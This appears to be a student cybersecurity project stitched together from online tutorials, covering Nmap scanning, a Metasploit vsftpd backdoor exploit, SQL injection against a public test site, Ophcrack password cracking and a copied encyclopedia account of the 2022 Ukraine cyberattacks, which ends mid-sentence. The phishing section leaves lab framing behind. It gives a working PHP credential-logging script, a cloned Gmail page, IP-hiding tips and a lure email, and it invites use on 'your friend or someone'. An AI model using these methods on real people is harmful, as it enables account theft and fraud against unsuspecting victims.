Cyber Security November Major Project

Project Description: 1. Perform Scanning Module by using Nmap tool (Download

from Internet) and scan kalilinux and Windows 7 machine and find the
open/closed ports and services running on machine Hacker Machine: Windows 10
Victim machine: Kali Linux and Windows 7.

The first step to working with nmap is to log into the Kali Linux machine and if desired, start
a graphical session.
During the installation, the installer would have prompted the user for a ‘root‘user
password which will be needed to log in. Once logged in to the Kali Linux machine, using the
command ‘startx‘ the XFCE Desktop Environment can be started – it is worth noting that
nmap doesn’t require a desktop environment to run.

Once logged into XFCE, a terminal window will need to be opened. By clicking on the
desktop background, a menu will appear. Navigating to a terminal can be done as follows:
Applications -> System -> ‘Xterm‘ or ‘UXterm‘ or ‘Root Terminal ‘.
The author is a fan of the shell program called Terminator but this may not show up in a
default install of Kali Linux. All shell programs listed will work for the purposes of nmap.
Once a terminal has been launched, the nmap fun can begin. For this particular tutorial, a
private network with a Kali machine and a Metasploitable machine was created.
This made things easier and safer since the private network range would ensure that scans
remained on safe machines and prevents the vulnerable Metasploitable machine from
being compromised by someone else. In this example, both of the machines are on a
private 192.168.56.0 /24 network. The Kali machine has an IP address of 192.168.56.101
and the Metasploitable machine to be scanned has an IP address of 192.168.56.102.
Let’s say though that the IP address information was unavailable. A quick nmap scan can
help to determine what is live on a particular network. This scan is known as a ‘Simple List’
scan hence the -sL arguments passed to the nmap command.
# nmap -sL 192.168.56.0/24

Nmap –
Scan Network for Live Hosts
Sadly, this initial scan didn’t return any live hosts. Sometimes this is a factor in the way
certain Operating Systems handle port scan network traffic.

# Nmap 192.168.56.1,100-102
These ports all indicate some sort of listening service on this particular machine. Recalling
from earlier, the 192.168.56.102 IP address is assigned to the metasploitable vulnerable
machine hence why there are so many open ports on this host.

2.Test the System Security by using Metasploit Tool from kali linux and
hack the windows 7 / win dows10. Execute the commands to get the
keystrokes / screenshots / Webcam and etc., Write a report on
vulnerability issue along with screenshots how you performed and
suggest th security patch to avoid these type of attacks Hacker
Machine: Kali Linux Victim machine: Windows XP / Windows 7.

Metasploit Framework
The Metasploit Framework is an open-source penetration testing and
development platform that provides exploits for a variety of applications,
operating systems and platforms. Metasploit is one of the most commonly
used penetration testing tools and comes built-in to Kali Linux.

The main components of the Metasploit Framework are called modules.

Modules are standalone pieces of code or software that provide
functionality to Metasploit. There are six total modules: exploits, payloads,
auxiliary, nops, posts, and encoders. We will just focus on exploits and
payloads.
Exploit
An exploit takes advantage of a system’s vulnerability and installs a payload.
Payload
The payload gives access to the system by a variety of methods (reverse
shell, meterpreter etc.)

We will us both of these to gain access to the victim machine in the exercise
detailed later.
Environment Setup
Virtualbox
Virtualbox is an operating system emulation software that gives us the
ability to run additional systems from our local machine.
Kali Linux
Kali Linux will be our local machine where we can run our attacks from.
Since we will need both Kali and the Metasploitable vulnerable machine
running we will use Virtualbox to emulate both environments.

Metasploitable 2

Metasploitable 2 is designed to be vulnerable in order to work as a sandbox

to learn security. This will provide us with a system to attack legally. Most of
the vulnerabilities on Metasploitable are known so there are tons of
resources available to help learn various attack types.
Metasploitable Installation
The pictures below show the settings to setup a new virtual machine for
Metasploitable.
Metasploitable shouldn’t need more than 256MB of ram but you can add
more if your system can handle it.
Instead of creating a new hard disk the Metasploitable machine we
downloaded will act as our existing virtual hard disk.

We do not want the Metasploitable machine on our actual network, so

configure the settings for that machine as below. Make sure the Kali
machine is also on the Host-Only Adapter. (Settings or tabs not shown in
the pictures below were left as default)

Main settings page for Metasploitable

 Make sure to change the network settings to Host-only

Make sure to change the network settings for Metasploitable to host-only

adapter

Once we are done changing the settings, we can start Metasploitable. The
login and password are both: msfadmin. After logging in we can leave it
running and start up Kali Linux. From there we can work with the Metasploit
framework on Kali Linux.
 Note: When entering password, it won’t show on the screen

Exploiting VSFTPD v2.3.4 Backdoor Command Execution

Now that everything is setup, we can focus on how we can break into the
Metasploitable 2 machine from our Kali Linux VM.

With Metasploitable 2 most if not all the vulnerabilities are known. But that
is not usually the case. For systems in the wild there is many more steps to
get into an unknown system or network. To get comfortable with the
Metasploit Framework we can look up vulnerabilities online to get
comfortable with the workflow.

For this walk-through we will focus on VSFTPD v2.3.4. This vulnerability will
provide root shell using Backdoor Command Execution. This means we will
have full access to Metasploitable 2’s command line.
Step 1: Start the Metasploit Console
 Open the command terminal inside Kali and type
msfconsole

Opening the Metasploit console from the terminal

Now that the console has loaded up, we can start prepping our exploit.
VSFTPD (very secure ftp daemon) is a secure ftp server for unix based
systems. The vulnerability we are exploiting was found in 2011 in version
2.3.4 of VSFTPD which allows for a user to connect to the server without
authentication.
 With Metasploit open we can search for the vulnerability by name.
search vsftpd
  The search reveals the location of the exploitation we want to run. We
can select it using the location.
use exploit/unix/ftp/vsftpd_234_backdoor

 Check the options to see what other information is necessary to run

the exploit.
show options

We are missing the target IP but the rest of the information is automatically filled in.

 The last piece of the setup is to point Metasploit to the victim machine
which is our Metasploitable 2 VM. Set the RHOST to the IP of the
Metasploitable machine.
set RHOST [victim IP]

 The IP can be found using ifconfig within Metasploitable. The IP

address is at the beginning of the second line inet
 addr:192.168.56.100. Use the IP address that shows on your machine
since it will be different from the one shown here.

 Checking the options one more time shows that all requirements are
filled

 The final step is to run the exploit to gain access to Metasploitable

run
  As you can see above, we have gained access to Metasploitable
remotely. A command shell has opened that allows us to navigate
through the system and modify things as we go. From here we can run
all sorts of havoc on the victim machine.

3. Use SET Tool and create a fake Gmail page and try to capture
the credentials in command line and Hacker Machine: Kali Linux
Victim machine: Windows XP / Windows 7 / Windows 10
 This Procedure can be used to make fake page for other
websites like yahoo,msn,or any other sites which you want
to steal the password of particular user.
 Step 1:
Go to the gmail.com. Save the Page as “complet
HTML” file
 Step 2:
Once you save the login page completely, you will see
a HTML file and a folder with the name something like
 email from google files.There will be two image files
namely “google_transparent.gif”,”mail_logo.png”
 Step3:
Upload those images to tinypic or photobucker.com.
copy the url of each image.
 Step4:
Open the HTML file in Wordpad.
Search for “google_transparent.gif” (without quotes)
and replace it with corresponding url .
Search for “mail_logo.png” (without quotes) and
replace it with corresponding url .
 Step 5:
Search for the

action=”https://www.google.com/accounts/ServiceLoginAuth
”
 Replace it with
 action=”http://yoursite ruler/login.php”
 save the file.
Step6:
Now you need to create login.php
so, you need to open the notepad and type as
 <?php
header (“Location:
https://www.google.com/accounts/ServiceLoginAuth “);
$handle = fopen(“pswrds.txt”, “a”);
foreach ($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
 save it
 Step 7:
open the notepad and just save the file as
“pswrds.txt” without any contents.
 Now upload those three files (namely No suggestions,
pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must has php feature.
Use one of these sites: 110mb.com, spam.com justfree.com
or 007sites.com.
use this site through the secure connection sites (so that
you can hide your ip address) like: http://flyproxy.com . find
best secure connection site.
 Step 8:
create an email with gmail keyword.
like: [email protected]
 Step 9:
Send to victim similar to” gmail starts new feature to use
this service log in to this page” from that gmail id with link to
your phishing web page.
 we are going to clone gmail.com to construct our phishing
page. So, select option 2.
 set:webattack>2
[-] Credential harvester will allow you to utilize the
clone capabilities within SET
[-] to harvest credentials or parameters from a
website as well as place them into a report
[-] This option is used for what IP the server will POST
to.
[-] If you're using an external IP, use your external IP
for this
set:webattack> IP address for the POST back in
Harvester/Tabnabbing:192.168.1.7
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to
clone:http://www.gmail.com
 The best way to use this attack is if username and
password form
fields are available. Regardless, this captures all
POSTs on a website.
[!] I have read the above message.
Press <return> to continue
[*] Social-Engineer Toolkit Credential Harvester
Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives
below:
 On selecting option 2, it will ask for 2 important pieces of
information. The first is the ip address, to which it would
submit the data and second is the url to clone which is in this
case gmail.com
 So, enter the details and press enter when it asks to press
return. Now the credential harvester would start a web
server on port 80 which would serve the page gmail.com.
Open the ip address of the machine in the browser from
some other machine or just localhost. For example, if SET is
running on machine with ip address 192.168.1.10 then open
that ip in a browser from another machine
"http://192.168.1.10". Or give the ip address to someone
else over the network :)
 Now, when the username, password is entered and
submitted, SET would capture the data and display on the
terminal. Moreover, after capturing the data SET would
redirect the user to the actual site, that is gmail.com
 192.168.1.101 - - [15/Apr/2013 14:56:39] "GET /
HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET /
HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET /
HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=http://mail.google.com/mail/
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-2825129499091793842
PARAM: ltmpl=default
PARAM: scc=1
PARAM: GALX=W37Icb1p3hI
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
PARAM: timeStmp=
PARAM: secTok=
PARAM: _utf8=?
PARAM: bgresponse=!
A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO
0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1
eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77Od
sqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9Db
rD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-
4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszf
YzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe
2cq81e-
81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5It
bkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy
_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682
WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQ
r5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcY
VMNRJpPa-
7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1S
Hpr-Q3HChWkx7y-
yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-
jMDkQpnn6uQ-
Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvk
WLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC
5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1I
A84ZpCuMt7WwEWuXss2OIrf_pfN4-
 YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbV
qHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6A
bnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp
-GwjEoEanv7eZ22RgrE
POSSIBLE USERNAME FIELD FOUND: Email=ghj
POSSIBLE PASSWORD FIELD FOUND: Passwd=ghj
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
PARAM: rmShown=1
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO
GENERATE A REPORT.
 See the fields Email and Passwd, they contain the details
typed by user. If you want to carry out this hack on a real
user like your friend or someone, then you have to give them
a link that they can open from their computer and access the
SET clone of gmail.
 If you have SET running on your local machine then you
have to give your public ip address to the victim. He would
open the link and get the login page of gmail. The rest of
task is to persuade him to login through that page. If you are
able to do so, then you get the login details. The credential
harvester attack is not limited to just stealing the login data.
It can capture any generic form submission.
 Phishing attacks are very common in the form of spam
emails. Hackers setup phishing pages on webhosts and then
spread the links over email to users. The phishing pages
includes simple email sites to bank logins and even more.


4. Install Social Phish tool from GitHub and try to execute

the tool for phishing page and perfrom in lab setup only
o installs socialfish, we can either download it as a zip file or clone the github
repository using the terminal by running the below command.
Git clone https://github.com/UndeadSec/SocialFish.git
After downloading, we now move into the directory.
cd SocialFish

Once in the directory, we want to download all the requirements for running and
using socialfish.
pip install -r requirements.txt
When the installation is complete, we are now ready to launch the phishing
attack.

After the installation is complete, we have to make the SocialFish.py file

executable. To do this, we will use the below command.
Chmod +x SocialFish.py
To run the tool, we use the below syntax.
./SocialFish.py <username> <pass>
On the “<username>” we will set the username we will use to login and “<pass>”
is where we will insert the password we will be using. We will run it as shown
below.
And once the tool starts, we can login to the main page as indicated on the
terminal shown below. To login to the admin panel we navigate to the address
“0.0.0.0:5000/Neptune”.
We open our preferred web browser and navigate to the above specified link to
login as shown in the below image. From the main page, we can launch a phishing
attack on our target.
Once we login to the main page, we can see different useful components we can
use in our phishing.

As shown on the above image, we have a field to input the link of the website we
want to clone and input field for the webpage we want to be redirected to. You
can also choose use a custom HTML page. We have an option to inject beef-xss to
our phishing page to use with BeEF tool.
Socialfish also has an access token in case you want to connect it to your android
app for easier phishing attacks management. Send mail option will enable us to
send phishing email direct to our target inbox from the main page as shown on
the image below.

After the phishing is complete, we can generate a complete phishing report using
the button on the main page too.
At the bottom of the phishing page is where we will be able to view our phishing
reports and we can also perform deeper information gathering on our targets. We
can scan for open ports and even use shodan to gather more information.
In this guide we will be launching a custom attack hence we will use the custom
page as shown on the image below.
Now after the user enters his/her credentials he/she will be redirected to
www.google.com.

This step is usually optional and is used only when your target is not on the same
local area network as you are in. Using this option will make the socialfish
instance you are running accessible by anyone as long as they have an active
internet connection.
Ngrok helps us to tunnel the traffic sent through the port we are using on
socialfish which is port 5000 using the below command.
ngrok http 5000
Ngrok helps us to tunnel the traffic sent through the port we are using on
socialfish which is port 5000 using the below command.
ngrok http 5000
You can share the link generated on ngrok with the target. Once he/she clicks on
the link he will be directed to the login page as shown on the image below.
Once the victim enters the user email address and the password and signs in,
he/she will be redirect to the link we had provided earlier. Now the details have
been logged on the admin page and we can view them as shown on the image
below.

.
Step 1: Open your Kali Linux operating system. Move to desktop.
Here you have to create a directory called Social phish. In this
directory, you have to install the tool.
cd Desktop

Step 2: Now you are on the desktop. Here you have to create a
directory called Social phish. To create the Mask, phish directory use
the following command.
mkdir Socialphish
Step 3: You have created a directory. Now use the following
command to move into that directory.
cd Socialphish

Step 4: Now you are in the Socialphish directory. In this directory you
have to download the tool means you have to clone the tool from
GitHub. Use the following command to clone the tool from GitHub.
git clone https://github.com/xHak9x/SocialPhish.git
Step 5: The tool has been downloaded in the directory Socialphish.
Now to list out the contents of the tool that has been downloaded use
the following command.
ls

Step 6: When you listed out the contents of the tool you can see that a
new directory has been generated by the tool that is SocialPhish. You
have to move to this directory to view the contents of the tool. To
move in this directory using the following command.
cd SocialPhish
Step 7: To list out the contents of this directory use following
command.
ls

Step 8. Now you have to give permission to the tool using the
following command.

chmod +x socialphish.sh

Step 9: Now you can run the tool using the following command. This
command will open the help menu of the tool.
./socialphish.sh
The tool is running successfully. Now you have to give the option
number to the tool for which you have to create the phishing page.
Suppose you want to create a phishing page for Instagram then you
have to choose option 1. If you want a phishing page on Facebook
choose option 2. Similarly, you can choose from all 33 websites in the
tool.

Usages:
Use Socialphish and create a phishing page for Instagram.
01
02
Type 01 and then for port forwarding 02

You can see the link has been generated by the tool that is the
Instagram phishing webpage. Send this link to the victim. Once he/she
opens the link he/she will get an original look-alike web page of
Instagram and once he/she fills in the details on the webpage. It will
be highlighted in the Socialphish terminal.
You can see here we have filled the login form we have given
username as geeky and password as geekygeeky now once victim
clicks on login all the details will be shown in socialphish terminal.
You can see credentials have been found. Even you can perform this
attack using yourself on to your target. This was all about Socialphish.
Socialphish is a powerful open-source tool Phishing Tool. Socialphish
is becoming very popular nowadays that is used to do phishing
attacks on Target. Socialphish is easy than Social Engineering Toolkit.
Socialphish contains some templates generated by another tool called
Socialfish. Socialphish offers phishing templates and web pages for 33
popular sites such as Facebook, Instagram, Google, Snapchat, Github,
Yahoo, Protonmail, Spotify, Netflix, Linkedin, WordPress, Origin,
Steam, and Microsoft, etc.

5. Perform SQL injection Manually on

http://testphp.vulnweb.com Write a report along with
screenshots and mention preventive steps to avoid SQL
injections

Let’s begin!
http://www.hackingarticles.in/beginner-guide-sql-injection-part-1/
Open given below targeted URL in the browser
http://testphp.vulnweb.com/artists.php?artist=1
So here we are going test SQL injection for “id=1″

Now use error base technique by adding an apostrophe (‘) symbol at the end of
input which will try to break the query.
testphp.vulnweb.com/artists.php?artist=1'
In the given screenshot you can see we have got an error message which means
the running site is infected by SQL injection.

Now using ORDER BY keyword to sort the records in ascending or descending

order for id=1
http://testphp.vulnweb.com/artists.php?artist=1 order
by 1
Similarly repeating for order 2, 3 and so on one by one
http://testphp.vulnweb.com/artists.php?artist=1 order
by 2

http://testphp.vulnweb.com/artists.php?artist=1 order
by 4
From the screenshot, you can see we have got an error at the order by 4 which
means it consists only three records.
Let’s penetrate more inside using union base injection to select statement from a
different table.
http://testphp.vulnweb.com/artists.php?artist=1 union
select 1,2,3
From the screenshot, you can see it is show result for only one table not for
others.

Now try to pass wrong input into the database through URL by replacing artist=1
from artist=-1 as given below:
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1,2,3
Hence you can see now it is showing the result for the remaining two tables also.
Use the next query to fetch the name of the database
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1,database(),3
From the screenshot, you can read the database name acuart

Next query will extract the current username as well as a version of the database
system
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, version(),current_user()
Here we have retrieved 5.1.73 0ubuntu0 10.04.1 as version and
acuart@localhost as the current user
Through the next query, we will try to fetch table name inside the database
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, table_name,3 from information_schema.tables
where table_schema=database() limit 0,1
From the screenshot you read can the name of the first table is artists.

http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, table_name,3 from information_schema.tables
where table_schema=database () limit 1,1
From the screenshot you can read the name of the second table is carts.

Similarly, repeat the same query for another table with slight change
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, table_name,3 from information_schema.tables
where table_schema=database () limit 2,1
We got table 3: cater

http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, table_name,3 from information_schema.tables
where table_schema=database () limit 3,1
We got table 4: featured
Similarly repeat the same query for table 4, 5, 6, and 7 with making slight changes
in LIMIT.
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, table_name,3 from information_schema.tables
where table_schema=database () limit 7,1
We got table 7: users

http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, table_name,3 from information_schema.tables
where table_schema=database () limit 8,1
Since we didn’t get anything when the limit is set 8, 1 hence there might be 8
tables only inside the database.
the concat function is used for concatenation of two or more string into a single
string.
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1,group_concat(table name),3 from
information_schema.tables where table_schema=database
()
From screen you can see through concat function we have successfully retrieved
all table name inside the
database.
Table 1: artist
Table 2: Carts
Table 3: Cater
Table 4: Featured
Table 5: Guestbook
Table 6: Pictures
Table 7: Product
Table 8: users
Maybe we can get some important data from the users table, so let’s penetrate
more inside. Again, Use the concat function for table users for retrieving its entire
column names.
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1, group_concat(column name),3 from
information_schema.columns where table_name='users'
Awesome!! We successfully retrieve all eight column names from inside the table
users.
Then I have chosen only four columns i.e. uname, pass, email and cc for further
enumeration.

Use the concat function for selecting uname from table users by executing the
following query through URL
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1,group_concat(uname),3 from users
From the screenshot, you can read uname: test

Use the concat function for selecting pass from table users by executing the
following query through URL
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1,group_concat(pass),3 from users
From the screenshot, you can read pass: test

Use the concat function for selecting cc (credit card) from table users by executing
the following query through URL
http://testphp.vulnweb.com/artists.php?artist=-1 union
select 1,group_concat(cc),3 from users
From the screenshot, you can read cc: 1234-5678-2300-9000

Use the concat function for selecting email from table users by executing the
following query through URL
http://testphp.vulnweb.com/artists.php?artist=-1 union select
1,group_concat(email),3 from users
From the screenshot, you can read email: [email protected]
Enjoy hacking!!

6. Crack the password of windows machine by using ophcrack

tool in virtual machine on windows 7 and try get the password,
along with that mention the path of SAM file in windows and
explain about SAM file usage and how it can be cracked by tool.

1. Download Ophcrack LiveCD.

Search “Ophcrack” on Google and open the following page. Click
“Download ophcrack Live CD” and choose “ophcrack Vista
LiveCD” on next page and download it.

2. Burn ISO image file to a CD/DVD or USB flash drive

(take as example).
After downloading, you could find ophcrack Vista is an ISO image
file. You should burn the Ophcrack ISO image file to a blank disc,
such as writable USB flash or CD/DVD. Burning an ISO file is
different from burning a normal file. It needs a tool, such as
UltraISO, ISO2Disc to burn ISO file into USB drive or CD/DVD.
3. Boot Windows 7 computer from disc you have just
burned.
After burning ophcrack into disc, boot computer from the disc by
rebooting your computer with newly created USB disc or CD/DVD
disc in the drive. Then Linux will load, Ophcrack will start, and
Windows password recovery begins.
Tips: If I burned the ISO file, but it does not boot Ophcrack when I
reboot my machine. We have to verify there have been two
directories stored on the CD: boot and tables.
4. Recover Windows user password.
Ophcrack will locate users on your Windows systems and begin
cracking their password. The password recovery process is
automatic. When the passwords are displayed on screen, write
them down.

5. Remove Ophcrack disc and login Windows with

recovered password.
As the introduction at the beginning of this passage, the recovery
success rate of Ophcrack has not reached 100%. So, if ophcrack
cannot find Windows 7 password, how should you do? Please
refer to it if necessary.
7. Write an article on cybersecurity and recent attacks which
you came across in media and news and research on that news,
and explain the any topic which you learned in this course and
mention what you learned.
Cybersecurity attacks are a growing threat to all of us. What are the recent
cybersecurity attacks?
This article will help you know about the cybersecurity attacks in recent years.
But first, what is a cybersecurity attack?

Cybersecurity Attack: Definition

In simple words, a cybersecurity attack is something that attacks a computer
system or network.
It also has many types, including:
1. Malware
2. Ransomware
3. Phishing
4. Man in the middle
5. Crypto jacking
6. DDoS or Denial of Service
7. SQL injection
8. Zero-day attacks
Now, we know about the definition of cyberattacks. We also know the common
attacks.
Let us find out the recent cybersecurity attacks that hit the cyber world.

2022 Ukraine cyberattacks

From Wikipedia, the free encyclopedia
Jump to navigationJump to search

Ukrainian Ministry of Foreign Affairs website defaced by hackers

show
 V
 T
 E
Russo-Ukrainian War (outline)
During the prelude to the 2022 Russian invasion of Ukraine and the 2022 Russian
invasion of Ukraine, multiple cyberattacks against Ukraine were recorded, as well
as some attacks on Russia. The first major cyberattack took place on 14 January
2022, and took down more than a dozen of Ukraine's government websites.[1]
According to Ukrainian officials, around 70 government websites, including the
Ministry of Foreign Affairs, the Cabinet of Ministers, and the Security and Defense
Council, were attacked. Most of the sites were restored within hours of the
attack.[2] On 15 February, another cyberattack took down multiple government
and bank services.[3][4]
On 24 February, Russia launched a full-scale invasion of Ukraine. Western
intelligence officials believed that this would be accompanied by a major
cyberattack against Ukrainian infrastructure, but this threat did not materialize. [5]
Cyberattacks on Ukraine have continued during the invasion, but with limited
success. Independent hacker groups, such as Anonymous, have launched
cyberattacks on Russia in retaliation for the invasion.[5][6]
Contents
 1Background
 2January attacks
o 2.1Reactions to January attack
 2.1.1Russia
 2.1.2Ukraine
 2.1.3International organizations
 3February attacks
 4March attacks
 5See also
 6References
Background
Main article: 2021–2022 Russo-Ukrainian crisis
At the time of the attack, tensions between Russia and Ukraine were high, with
over 100,000 Russian troops stationed near the border with Ukraine and talks
between Russia and NATO ongoing.[1] The US government alleged that Russia was
preparing for an invasion of Ukraine, including "sabotage activities and
information operations". The US also allegedly found evidence of "a false-flag
operation" in Eastern Ukraine, which could be used as a pretext for invasion. [2]
Russia denies the accusations of an impending invasion, but has threatened
"military-technical action" if its demands are not met, especially a request that
NATO never admit Ukraine to the alliance. Russia has spoken strongly against the
expansion of NATO to its borders.[2]
January attacks
The attacks on 14 January 2022 consisted of the hackers replacing the websites
with text in Ukrainian, erroneous Polish, and Russian, which state "be afraid and
wait for the worst" and allege that personal information has been leaked to the
internet.[7] About 70 government websites were affected, including the Ministry of
Foreign Affairs, the Cabinet of Ministers, and the Security and Defense Council.[8]
The SBU has stated that no data was leaked. Soon after the message appeared,
the sites were taken offline. The sites were mostly restored within a few hours. [1]
Deputy secretary of the NSDC Serhiy Demedyuk, stated that the Ukrainian
investigation of the attack suspects that a third-party company's administration
rights were used to carry out the attack. The unnamed company's software had
been used since 2016 to develop government sites, most of which were affected
in the attack.[8] Demedyuk also blamed UNC1151, a hacker group allegedly linked
to Belarusian intelligence, for the attack.[9]
A separate destructive malware attack took place around the same time, first
appearing on 13 January. First detected by the Microsoft Threat Intelligence
Center (MSTIC), malware was installed on devices belonging to "multiple
government, non-profit, and information technology organizations" in Ukraine. [10]
Later, this was reported to include the State Emergency Service and the Motor
Transport Insurance Bureau.[11] The software, designated DEV-0586 or Whisper
Gate, was designed to look like ransomware, but lacks a recovery feature,
indicating an intent to simply destroy files instead of encrypting them for ransom.
[10]
The MSTIC reported that the malware was programmed to execute when the
targeted device was powered down. The malware would overwrite the master
boot record (MBR) with a generic ransom note. Next, the malware downloads a
second .exe file, which would overwrite all files with certain extensions from a
predetermined list, deleting all data contained in the targeted files. The
ransomware payload differs from a standard ransomware attack in several ways,
indicating a solely destructive intent.[12] However, later assessments indicate that
damage was limited, likely a deliberate choice by the attackers. [11]
On 19 January, the Russian advanced persistent threat (APT) Gamaredon (also
known as Primitive Bear) attempted to compromise a Western government entity
in Ukraine.[13] Cyber espionage appears to be the main goal of the group,[13] which
has been active since 2013; unlike most APTs, Gama redon broadly targets all
users all over the globe (in addition to also focusing on certain victims, especially
Ukrainian organizations[14]) and appears to provide services for other APTs.[15] For
example, the InvisiMole threat group has attacked select systems that
Gamaredon had earlier compromised and fingerprinted.[14]
Reactions to January attack
Russia
Russia denied allegations by Ukraine that it was linked to the cyberattacks. [16]
Ukraine
Ukrainian government institutions, such as the Center for Strategic
Communications and Information Security and the Ministry of Foreign Affairs,
suggested that the Russian Federation was the perpetrator of the attack, noting
that this would not be the first time that Russia attacked Ukraine.[7][17]
International organizations
European Union High Representative Josep Borrell said of the source of the
attack: “One can very well imagine with a certain probability or with a margin of
error, where it can come from.”[18] The Secretary General of NATO Jens
Stoltenberg announced that the organization would increase its coordination with
Ukraine on cyberdefense in the face of potential additional cyberattacks. NATO
later announced that it would sign an agreement granting Ukraine access to its
malware information sharing platform.[2][7]
February attacks
On 15 February, a large DDoS attack brought down the websites of the defense
ministry, army, and Ukraine's two largest banks, PrivatBank and Oschadbank.[3][19]
[4]
Cybersecurity monitor NetBlocks reported that the attack intensified over the
course of the day, also affecting the mobile apps and ATMs of the banks.[3] The
New York Times described it as "the largest assault of its kind in the country's
history". Ukrainian government officials stated that the attack was likely carried
out by a foreign government, and suggested that Russia was behind it. [20]
Although there were fears that the denial-of-service attack could be cover for
more serious attacks, a Ukrainian official said that no such attack had been
discovered.[11]
According to UK government[21] and National Security Council of the US, the attack
was performed by Russian Main Intelligence Directorate (GRU). American
cybersecurity official Anne Neuberger stated that known GRU infrastructure has
been noted transmitting high volumes of communications to Ukraine-based IP
addresses and domains.[22] Kremlin spokesperson Dmitry Peskov denied that the
attack originated from Russia.[23]
On 23 February, a third DDoS attack took down multiple Ukrainian government,
military, and bank websites. Although military and banking websites were
described as having “a more rapid recovery”, the SBU website was offline for an
extended period.[24] Just before 5 pm, data wiping malware was detected on
hundreds of computers belonging to multiple Ukrainian organizations, including in
the financial, defense, aviation, and IT services sectors. ESET Research dubbed the
malware HermeticWiper, named for its genuine code signing certificate from
Cyprus-based company Hermetica Digital Ltd. The wiper was reportedly compiled
on 28 December 2021, while Symantec reported malicious activity as early as
November 2021, implying that the attack was planned months ahead of time.
Symantec also reported wiper attacks against devices in Lithuania, and that some
organizations were compromised months before the wiper attack. Similar to the
January WhisperGate attack, ransomware is often deployed simultaneously with
the wiper as a decoy, and the wiper damages the master boot record. [25][26]
A day prior to the attack, the EU had deployed a cyber rapid-response team
consisting of about ten cybersecurity experts from Lithuania, Croatia, Poland,
Estonia, Romania, and the Netherlands. It is unknown if this team helped mitigate
the effects of the cyberattack.[27]
The attack coincided with the Russian recognition of separatist regions in eastern
